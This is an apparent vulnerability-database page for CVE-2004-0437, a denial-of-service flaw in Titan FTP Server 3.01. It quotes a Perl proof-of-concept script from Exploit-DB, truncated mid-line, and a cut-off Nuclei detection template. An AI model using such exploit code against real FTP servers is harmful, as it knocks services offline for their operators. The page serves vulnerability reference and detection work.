CVE-2004-0437
Published: 2004-07-07
Priority: P4 (20) · medium · 5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 7.67% (93.8th percentile)
Titan FTP Server version 3.01 build 163, and possibly other versions before build 169, allows remote authenticated users to cause a denial of service (crash) by disconnecting from the system during a "LIST -L" command, which causes Titan to access an invalid socket.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| south_river_technologies | titan_ftp_server | — | — |
No detection rules found.
Exploit-DB
Titan FTP Server 3.0 - 'LIST' Denial of Service
exploitdb·2004-05-04
---
source: https://www.securityfocus.com/bid/10272/info
Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.
A remote attacker can crash the FTP server, which improperly handles a non-existent socket.
```perl
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
use IO::Socket;

$host = "192.168.1.243";
my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i]; $i++)
{
    print "Combination: $i\n";

    $remote = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $host,
        PeerPort => "2112",
    );
    unless ($remote) { die "cannot connect to ftp daemon on $host" }
    print "connected\n";

    # Read the server greeting until the 220 banner arrives
    while (<$remote>)
    {
        print $_;
        if (/220 /)
        {
            last;
        }
    }

    $remote->autoflush(1);
    my $ftp = "USER
```
Nuclei
Titan FTP Server 3.01 - DoS via LIST Command Disconnection
nuclei·CVSS 5.0
Titan FTP Server version 3.01 build 163 (and possibly other older versions) contains a vulnerability where disconnecting during a LIST -L command may crash the daemon. Remote attackers can cause denial of service by initiating a LIST -L command and then abruptly disconnecting, leading to server instability.
Template:
```yaml
id: CVE-2004-0437

info:
  name: Titan FTP Server 3.01 - DoS via LIST Command Disconnection
  author: pussycat0x
  severity: medium
  description: |
    Titan FTP Server version 3.01 build 163 (and possibly other older versions) contains a vulnerability where disconnecting during a LIST -L command may crash the daemon. Remote attackers can cause denial of service by initiating a LIST -L command and then abruptly disconnecting,
```
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.html
http://marc.info/?l=bugtraq&m=108378048513596&w=2
http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/16057
Published: 2004-07-07